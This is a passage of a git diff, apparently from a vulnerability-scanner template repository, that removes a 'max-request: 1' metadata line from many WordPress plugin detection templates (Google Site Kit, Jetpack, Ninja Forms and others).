b/http/technologies/wordpress/plugins/google-site-kit.yaml index 7b0f188ff7..2678f603c6 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-site-kit/ metadata: - max-request: 1 plugin_namespace: google-site-kit wpscan: https://wpscan.com/plugin/google-site-kit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 898e4de56d..20d947a5d1 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-sitemap-generator/ metadata: - max-request: 1 plugin_namespace: google-sitemap-generator wpscan: https://wpscan.com/plugin/google-sitemap-generator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 4a76856a69..22ee97b51f 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/gtranslate/ metadata: - max-request: 1 plugin_namespace: gtranslate wpscan: https://wpscan.com/plugin/gtranslate tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index b321ca63eb..3f4c6c8936 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/gutenberg/ metadata: - max-request: 1 plugin_namespace: gutenberg wpscan: https://wpscan.com/plugin/gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 2b42c9f80c..fa1bb64115 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/happy-elementor-addons/ metadata: - max-request: 1 plugin_namespace: happy-elementor-addons wpscan: https://wpscan.com/plugin/happy-elementor-addons tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index dbea07a6da..da63d1cbf6 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/header-footer-code-manager/ metadata: - max-request: 1 plugin_namespace: header-footer-code-manager wpscan: https://wpscan.com/plugin/header-footer-code-manager tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index 17a8f220cf..f94e7f6494 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/header-footer-elementor/ metadata: - max-request: 1 plugin_namespace: header-footer-elementor wpscan: https://wpscan.com/plugin/header-footer-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 956a08b32d..95d2aa5f16 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/header-footer/ metadata: - max-request: 1 plugin_namespace: header-footer wpscan: https://wpscan.com/plugin/header-footer tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index 5a570b9077..af8193b875 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/health-check/ metadata: - max-request: 1 plugin_namespace: health-check wpscan: https://wpscan.com/plugin/health-check tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 4ecac0cd92..8d7e45818b 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/hello-dolly/ metadata: - max-request: 1 plugin_namespace: hello-dolly wpscan: https://wpscan.com/plugin/hello-dolly tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index e50f58cef8..ed3967db7b 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/host-webfonts-local/ metadata: - max-request: 1 plugin_namespace: host-webfonts-local wpscan: https://wpscan.com/plugin/host-webfonts-local tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 031bb48563..2ff5adba86 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/imagify/ metadata: - max-request: 1 plugin_namespace: imagify wpscan: https://wpscan.com/plugin/imagify tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 3cdcf3da93..9099f3c0a5 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/imsanity/ metadata: - max-request: 1 plugin_namespace: imsanity wpscan: https://wpscan.com/plugin/imsanity tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index c222bc9d4a..1ee0e67542 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/insert-headers-and-footers/ metadata: - max-request: 1 plugin_namespace: insert-headers-and-footers wpscan: https://wpscan.com/plugin/insert-headers-and-footers tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index c8acf8c625..43cb2ab09c 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/instagram-feed/ metadata: - max-request: 1 plugin_namespace: instagram-feed wpscan: https://wpscan.com/plugin/instagram-feed tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 66b7d6a363..7ba81036cf 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/intuitive-custom-post-order/ metadata: - max-request: 1 plugin_namespace: intuitive-custom-post-order wpscan: https://wpscan.com/plugin/intuitive-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml index a36016562d..24fc3e3295 100644 --- a/http/technologies/wordpress/plugins/iwp-client.yaml +++ b/http/technologies/wordpress/plugins/iwp-client.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/iwp-client/ metadata: - max-request: 1 plugin_namespace: iwp-client wpscan: https://wpscan.com/plugin/iwp-client tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index 8033aacbc6..3e89505574 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/jetpack-boost/ metadata: - max-request: 1 plugin_namespace: jetpack-boost wpscan: https://wpscan.com/plugin/jetpack-boost tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index e4017b1a0a..e701e365ba 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/jetpack/ metadata: - max-request: 1 plugin_namespace: jetpack wpscan: https://wpscan.com/plugin/jetpack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 53d6d393bd..c0cc5400a8 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/kadence-blocks/ metadata: - max-request: 1 plugin_namespace: kadence-blocks wpscan: https://wpscan.com/plugin/kadence-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index c286e9a14f..22687bcffe 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/kirki/ metadata: - max-request: 1 plugin_namespace: kirki wpscan: https://wpscan.com/plugin/kirki tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 364e3cd71e..b69d3d5bfe 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/leadin/ metadata: - max-request: 1 plugin_namespace: leadin wpscan: https://wpscan.com/plugin/leadin tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 4fcccbfc33..7975a57702 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts-reloaded/ metadata: - max-request: 1 plugin_namespace: limit-login-attempts-reloaded wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index 3fbc714d3b..ff4cef94d7 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts/ metadata: - max-request: 1 plugin_namespace: limit-login-attempts wpscan: https://wpscan.com/plugin/limit-login-attempts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index c49b506979..a8903697b0 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/litespeed-cache/ metadata: - max-request: 1 plugin_namespace: litespeed-cache wpscan: https://wpscan.com/plugin/litespeed-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index dfcaf6f71b..3f141c4476 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/loco-translate/ metadata: - max-request: 1 plugin_namespace: loco-translate wpscan: https://wpscan.com/plugin/loco-translate tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 61be246fee..5355e988a2 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/loginizer/ metadata: - max-request: 1 plugin_namespace: loginizer wpscan: https://wpscan.com/plugin/loginizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginpress.yaml b/http/technologies/wordpress/plugins/loginpress.yaml index 1c16a72d76..6f06b49011 100644 --- a/http/technologies/wordpress/plugins/loginpress.yaml +++ b/http/technologies/wordpress/plugins/loginpress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/loginpress/ metadata: - max-request: 1 plugin_namespace: loginpress wpscan: https://wpscan.com/plugin/loginpress tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 50d2e6630b..53d409fb68 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-woocommerce/ metadata: - max-request: 1 plugin_namespace: mailchimp-for-woocommerce wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 8d71f7bde9..0e908a9580 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-wp/ metadata: - max-request: 1 plugin_namespace: mailchimp-for-wp wpscan: https://wpscan.com/plugin/mailchimp-for-wp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index 5e1f97086e..aeb1875c57 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mailpoet/ metadata: - max-request: 1 plugin_namespace: mailpoet wpscan: https://wpscan.com/plugin/mailpoet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index d87d456a8c..7c15702305 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/maintenance/ metadata: - max-request: 1 plugin_namespace: maintenance wpscan: https://wpscan.com/plugin/maintenance tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index aa9153241e..5ce87e6c71 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mainwp-child/ metadata: - max-request: 1 plugin_namespace: mainwp-child wpscan: https://wpscan.com/plugin/mainwp-child tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 09641796a3..c342e6b45a 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/malcare-security/ metadata: - max-request: 1 plugin_namespace: malcare-security wpscan: https://wpscan.com/plugin/malcare-security tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 28b70d09bf..e95041f555 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/megamenu/ metadata: - max-request: 1 plugin_namespace: megamenu wpscan: https://wpscan.com/plugin/megamenu tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index b43c10ed7a..879a0d1c12 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/members/ metadata: - max-request: 1 plugin_namespace: members wpscan: https://wpscan.com/plugin/members tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index eb7e78bc7f..985f5d373a 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/meta-box/ metadata: - max-request: 1 plugin_namespace: meta-box wpscan: https://wpscan.com/plugin/meta-box tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 3da2ea50e1..bbc305b8de 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ml-slider/ metadata: - max-request: 1 plugin_namespace: ml-slider wpscan: https://wpscan.com/plugin/ml-slider tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index 7a58c58f63..7e3e4e2d7e 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/newsletter/ metadata: - max-request: 1 plugin_namespace: newsletter wpscan: https://wpscan.com/plugin/newsletter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index 5f99b8cac8..17ea142c46 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/nextend-facebook-connect/ metadata: - max-request: 1 plugin_namespace: nextend-facebook-connect wpscan: https://wpscan.com/plugin/nextend-facebook-connect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index b08876df04..953e4ab3d8 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/nextgen-gallery/ metadata: - max-request: 1 plugin_namespace: nextgen-gallery wpscan: https://wpscan.com/plugin/nextgen-gallery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 3f68dffe06..92107fa69c 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ninja-forms/ metadata: - max-request: 1 plugin_namespace: ninja-forms wpscan: https://wpscan.com/plugin/ninja-forms tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 34f9bde1d6..5e1fe4ef5c 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ocean-extra/ metadata: - max-request: 1 plugin_namespace: ocean-extra wpscan: https://wpscan.com/plugin/ocean-extra tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index d9f645328f..74fb3e6010 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/official-facebook-pixel/ metadata: - max-request: 1 plugin_namespace: official-facebook-pixel wpscan: https://wpscan.com/plugin/official-facebook-pixel tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index 8a1196fc9f..b9f70ba555 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/one-click-demo-import/ metadata: - max-request: 1 plugin_namespace: one-click-demo-import wpscan: https://wpscan.com/plugin/one-click-demo-import tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index 05025452b7..6486c02c9a 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/optinmonster/ metadata: - max-request: 1 plugin_namespace: optinmonster wpscan: https://wpscan.com/plugin/optinmonster tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 1db1b57708..81f58198d3 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/otter-blocks/ metadata: - max-request: 1 plugin_namespace: otter-blocks wpscan: https://wpscan.com/plugin/otter-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index dafe6974f6..3743307dbc 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/password-protected/ metadata: - max-request: 1 plugin_namespace: password-protected wpscan: https://wpscan.com/plugin/password-protected tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index ba05fb1e16..a4c6980041 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/pdf-embedder/ metadata: - max-request: 1 plugin_namespace: pdf-embedder wpscan: https://wpscan.com/plugin/pdf-embedder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index a038adac53..e085f30e5a 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/pinterest-for-woocommerce/ metadata: - max-request: 1 plugin_namespace: pinterest-for-woocommerce wpscan: https://wpscan.com/plugin/pinterest-for-woocommerce tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 7f98d822a8..adf3387ddb 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/pixelyoursite/ metadata: - max-request: 1 plugin_namespace: pixelyoursite wpscan: https://wpscan.com/plugin/pixelyoursite tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 89602f4264..eb6e1aaa5d 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/polylang/ metadata: - max-request: 1 plugin_namespace: polylang wpscan: https://wpscan.com/plugin/polylang tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml index 2f6513ca42..b3c83cd0bf 100644 --- a/http/technologies/wordpress/plugins/popup-builder.yaml +++ b/http/technologies/wordpress/plugins/popup-builder.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/popup-builder/ metadata: - max-request: 1 plugin_namespace: popup-builder wpscan: https://wpscan.com/plugin/popup-builder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 982306b13c..96d8bd6aca 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/popup-maker/ metadata: - max-request: 1 plugin_namespace: popup-maker wpscan: https://wpscan.com/plugin/popup-maker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index fdcac13b56..85955ac95e 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/post-smtp/ metadata: - max-request: 1 plugin_namespace: post-smtp wpscan: https://wpscan.com/plugin/post-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index fc316f9f7a..a81fc892ca 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/post-types-order/ metadata: - max-request: 1 plugin_namespace: post-types-order wpscan: https://wpscan.com/plugin/post-types-order tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index 975b63f5de..d9c6052cd7 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/premium-addons-for-elementor/ metadata: - max-request: 1 plugin_namespace: premium-addons-for-elementor wpscan: https://wpscan.com/plugin/premium-addons-for-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index 5065659e82..afc1141e0c 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/pretty-link/ metadata: - max-request: 1 plugin_namespace: pretty-link wpscan: https://wpscan.com/plugin/pretty-link tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index 732ffbc4eb..d44add9ca6 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -7,7 +7,6 @@ info: reference: - 